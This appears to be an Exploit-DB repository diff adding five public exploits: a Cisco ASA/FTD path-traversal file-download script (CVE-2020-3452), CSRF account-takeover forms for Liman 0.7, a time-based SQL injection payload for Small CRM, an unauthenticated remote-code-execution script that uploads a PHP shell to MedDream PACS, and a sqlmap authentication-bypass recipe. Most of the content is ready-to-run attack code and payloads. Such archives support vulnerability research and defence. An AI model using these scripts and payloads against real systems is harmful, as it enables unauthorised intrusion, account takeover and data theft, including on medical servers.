DB: 2020-10-13

5 changes to exploits/shellcodes

Small CRM 2.0 - 'email' SQL Injection
MedDream PACS Server 6.8.3.751 - Remote Code Execution (Unauthenticated)
Liman 0.7 - Cross-Site Request Forgery (Change Password)
Online Students Management System 1.0 - 'username' SQL Injections
Cisco ASA and FTD 9.6.4.42 - Path Traversal

exploits/hardware/webapps/48871.txt

@@ -0,0 +1,25 @@
+# Exploit Title: Cisco ASA and FTD 9.6.4.42 - Path Traversal
+# Date: 2020-10-10
+# Exploit Author: 3ndG4me
+# Vendor: www.cisco.com
+# Product: https://www.cisco.com/c/en/us/products/security/asa-firepower-services/index.html
+# CVE : CVE-2020-3452
+
+
+
+TARGET=$1
+CISCO_KNOWN_FILES="logo.gif http_auth.html user_dialog.html localization_inc.lua portal_inc.lua include nostcaccess.html ask.html no_svc.html svc.html session.js useralert.html ping.html help app_index.html tlbr portal_forms.js logon_forms.js win.js portal.css portal.js sess_update.html blank.html noportal.html portal_ce.html portal.html home logon_custom.css portal_custom.css preview.html session_expired custom portal_elements.html commonspawn.js common.js appstart.js appstatus relaymonjar.html relaymonocx.html relayjar.html relayocx.html portal_img color_picker.js color_picker.html cedhelp.html cedmain.html cedlogon.html cedportal.html cedsave.html cedf.html ced.html lced.html files 041235123432C2 041235123432U2 pluginlib.js shshim do_url clear_cache connection_failed_form apcf ucte_forbidden_data ucte_forbidden_url cookie session_password.html tunnel_linux.jnlp tunnel_mac.jnlp sdesktop gp-gip.html auth.html wrong_url.html logon_redirect.html logout.html logon.html test_chargen"
+mkdir cisco_asa_files
+
+if [ -z "$1" ];
+then
+    echo "Usage: cve-2020-3452.sh <target ip/hostname>"
+    echo "Example: cve-2020-3452.sh mytarget.com"
+    echo "Files that are downloaded will be in the newly created 'cisco_asa_files' directory"
+    echo "Target not specificed...exiting..."
+else
+    for FILE in $CISCO_KNOWN_FILES;
+    do
+        curl "https://$TARGET/+CSCOT+/translation-table?type=mst&textdomain=%2bCSCOE%2b/${FILE}&default-language&lang=../" | tee cisco_asa_files/$FILE;
+    done
+fi

exploits/multiple/webapps/48869.txt

@@ -0,0 +1,64 @@
+# Exploit Title: Liman 0.7 - Cross-Site Request Forgery (Change Password)
+# Date: 2020-10-07
+# Exploit Author: George Tsimpidas
+# Software Link : https://github.com/salihciftci/liman/releases/tag/v0.7
+# Version: 0.7
+# Tested on: Ubuntu 18.04.5 LTS (Bionic Beaver)
+# Category: Webapp
+
+Description:
+
+There is no CSRF protection in Liman application, with a little help
+of social engineering (like sending a link via email/chat) an attacker may
+force the victim to click on a malicious link, with the purpose of
+manipulating his current account information, or changing entirely his
+password.
+
+Vulnerable Endpoints :
+
+http://127.0.0.1:5000/settings/profile
+http://127.0.0.1:5000/settings/password
+
+Proof of Concept
+
+
+Download the application, make an account and login inside the
+panel under : http://127.0.0.1:5000 expose the docker port on 5000.
+
+
+Save this .html files and send it to victim (Victim should be
+logged in in the browser)
+
+Crafted value will be added.
+
+Account Information CSRF :
+
+<html>
+<body>
+
+<script>history.pushState('', '', '/')</script>
+<form action="http://127.0.0.1:5000/settings/profile" method="POST">
+<input type="hidden" name="username" value="betatest" />
+<input type="hidden" name="email" value="test@gmail.com" />
+<input type="submit" value="TakeOver Account Settings" />
+
+</body>
+</html>
+
+
+Password Change CSRF :
+
+<html>
+<body>
+
+<script>history.pushState('', '', '/')</script>
+<form action="http://127.0.0.1:5000/settings/password" method="POST">
+<input type="hidden" name="password" value="takeover" />
+<input type="hidden" name="newPassword" value="takeover" />
+<input type="hidden" name="confirmPassword" value="takeover" />
+<input type="submit" value="Password TakeOver" />
+
+
+
+</body>
+</html>

exploits/php/webapps/48867.txt

@@ -0,0 +1,41 @@
+# Exploit Title: Small CRM 2.0 - 'email' SQL Injection
+# Google Dork: N/A
+# Date: 2020-10-10
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link: https://phpgurukul.com/small-crm-php/
+# Version: V2.0
+# Tested on: Kali Linux
+# CVE : N/A
+
+========== Vulnerable Code ==========
+
+mysqli_query $row1 = mysqli_query($con, "select email,password from user
+where email='" . $_POST['email'] . "'");  // dbconnection.php
+
+========== Post Request ====================
+
+POST /crm/forgot-password.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
+Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: localhost/crm/forgot-password.php
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 20
+Connection: close
+Cookie: __test=ec283e73906679549573af64209a5d5b;
+PHPSESSID=4d272f5938b3ec9c60bb45c4d7b44497
+Upgrade-Insecure-Requests: 1
+
+email=test@test.com&submit=
+
+============= Vulnerable Parameter ===============
+
+email (POST)
+
+============= Payload  =========================
+
+' AND (SELECT 1543 FROM (SELECT(SLEEP(5)))gSRd) AND 'PCOX'='PCOX

exploits/php/webapps/48868.py

@@ -0,0 +1,103 @@
+#!/usr/bin/python
+#
+# Exploit Title: MedDream PACS Server 6.8.3.751 - Remote Code Execution (Unauthenticated)
+# Exploit Author: bzyo
+# Twitter: @bzyo_
+# Date: 10-10-2020
+# Vulnerable Software: https://www.softneta.com/products/meddream-pacs-server/
+# Vendor Homepage: https://www.softneta.com
+# Version: 6.8.3.751
+# Tested On: Windows 2016
+#
+#
+# Update to EB 48853 < AUTHENTICATION WAS NOT NEEDED LOLZ
+#
+##PoC##
+#
+# 1. create one line php shell to call commands
+# 2. run script on attacking machine
+# 3. enter parameters; IP, filename, command
+# 
+#
+# root@kali:~# python meddream.py 
+# Enter IP Address: 192.168.0.223
+# Enter payload filename + .php: cmd.php
+# Enter command: whoami
+# 170759
+# <pre>nt authority\system
+# </pre>
+# http://192.168.0.223/Pacs/upload/20201010-170759--cmd.php?cmd=whoami
+# 404
+# 404
+# 404
+# 404
+# 404
+# 404
+# 404
+# 404
+# 404
+#
+#
+
+from urllib2 import urlopen                        
+import requests
+import sys
+import time
+from datetime import datetime, timedelta
+
+ip_addr = raw_input("Enter IP Address: ")
+user_file = raw_input("Enter payload filename + .php: ")
+cmd = raw_input("Enter command: ")
+
+URL= 'http://' + ip_addr + '/Pacs/uploadImage.php'
+
+def main():
+    session = requests.Session() 
+
+    files = [
+    ('actionvalue', (None, 'Attach', None)),
+    ('uploadfile', (user_file, open(user_file, 'rb'), 'application/x-php')),
+    ('action', (None, 'Attach', None)),
+    ]
+    
+    site = session.post(URL, files=files)
+
+    today = datetime.today()
+    upload_date = today.strftime("%Y%m%d")
+
+    less = 1
+    now1 = datetime.now()
+    up_time1 = now1.strftime("%H%M%S")
+    print(up_time1)
+    #varying time checks +/-
+    now2 = now1 - timedelta(seconds=less)
+    up_time2 = now2.strftime("%H%M%S")
+    now3 = now2 - timedelta(seconds=less)
+    up_time3 = now3.strftime("%H%M%S")
+    now4 = now3 - timedelta(seconds=less)
+    up_time4 = now4.strftime("%H%M%S")
+    now5 = now4 - timedelta(seconds=less)
+    up_time5 = now5.strftime("%H%M%S")
+    now6 = now5 - timedelta(seconds=less)
+    up_time6 = now6.strftime("%H%M%S")
+    now7 = now6 - timedelta(seconds=less)
+    up_time7 = now7.strftime("%H%M%S")
+    now8 = now1 + timedelta(seconds=less)
+    up_time8 = now8.strftime("%H%M%S")
+    now9 = now8 + timedelta(seconds=less)
+    up_time9 = now8.strftime("%H%M%S")
+    now10 = now1 + timedelta(seconds=less)
+    up_time10 = now9.strftime("%H%M%S")
+
+
+    up_time_array = [up_time1, up_time2, up_time3, up_time4, up_time5, up_time6, up_time7, up_time8, up_time9, up_time10]  
+    for i in up_time_array: 
+        r = session.get('http://' + ip_addr + '/Pacs/upload/'+ upload_date + "-" + i + "--" + user_file + "?cmd=" + cmd)
+        if r.status_code == 200: 
+            print r.content
+            print r.url
+        else:
+            print ("404")
+
+if __name__ == '__main__':
+    main()

exploits/php/webapps/48870.txt

@@ -0,0 +1,51 @@
+# Title: Online Students Management System 1.0 - 'username' SQL Injections
+# Exploit Author: George Tsimpidas
+# Date: 2020-10-09
+# Vendor Homepage: www.sourcecodester.com
+# Software Link:
+https://www.sourcecodester.com/sites/default/files/download/janobe/studentrecord_0.zip
+# Version : 1.0
+# Tested on: Ubuntu 18.04.5 LTS (Bionic Beaver)
+# Category: Webapp
+
+# Description
+
+The files index.php on the main login page, and the index.php on the
+/admin/ login page does not perform input validation on the regno
+and username parameters. An attacker can send malicious input in the post
+request to http://localhost/index.php or either
+http://localhost/admin/index.php and bypass authentication, extract
+sensitive information etc.
+
+#POC
+
+1) Navigate to the admin login page
+
+Example:
+
+http://localhost/admin/index.php
+
+2) Fill in dummy values for 'username' and 'password' fields and send the
+request via an HTTP intercept tool
+
+3) Save the request to file. Example, student_record_sqli.req
+
+POST /admin/index.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101
+Firefox/78.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 32
+Origin: http://localhost
+DNT: 1
+Connection: close
+
+username=admin&password=dummy
+
+4) Run SQLmap on the file,
+
+sqlmap -r student_record_sqli.req --dbms=mysql --threads=10 -p username

files_exploits.csv

@@ -40685,6 +40685,11 @@ id,file,description,date,author,type,platform,port
 48864,exploits/php/webapps/48864.txt,"Kentico CMS 9.0-12.0.49 - Persistent Cross Site Scripting",2020-10-09,"Ataberk YAVUZER",webapps,php,
 48865,exploits/php/webapps/48865.txt,"DynPG 4.9.1 - Persistent Cross-Site Scripting (Authenticated)",2020-10-09,"Enes Özeser",webapps,php,
 48866,exploits/json/webapps/48866.txt,"openMAINT 1.1-2.4.2 - Arbitrary File Upload",2020-10-09,mrb3n,webapps,json,
+48867,exploits/php/webapps/48867.txt,"Small CRM 2.0 - 'email' SQL Injection",2020-10-12,"Ahmet Ümit BAYRAM",webapps,php,
+48868,exploits/php/webapps/48868.py,"MedDream PACS Server 6.8.3.751 - Remote Code Execution (Unauthenticated)",2020-10-12,bzyo,webapps,php,
+48869,exploits/multiple/webapps/48869.txt,"Liman 0.7 - Cross-Site Request Forgery (Change Password)",2020-10-12,"George Tsimpidas",webapps,multiple,
+48870,exploits/php/webapps/48870.txt,"Online Students Management System 1.0 - 'username' SQL Injections",2020-10-12,"George Tsimpidas",webapps,php,
+48871,exploits/hardware/webapps/48871.txt,"Cisco ASA and FTD 9.6.4.42 - Path Traversal",2020-10-12,3ndG4me,webapps,hardware,
 42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,
 42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,
 42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,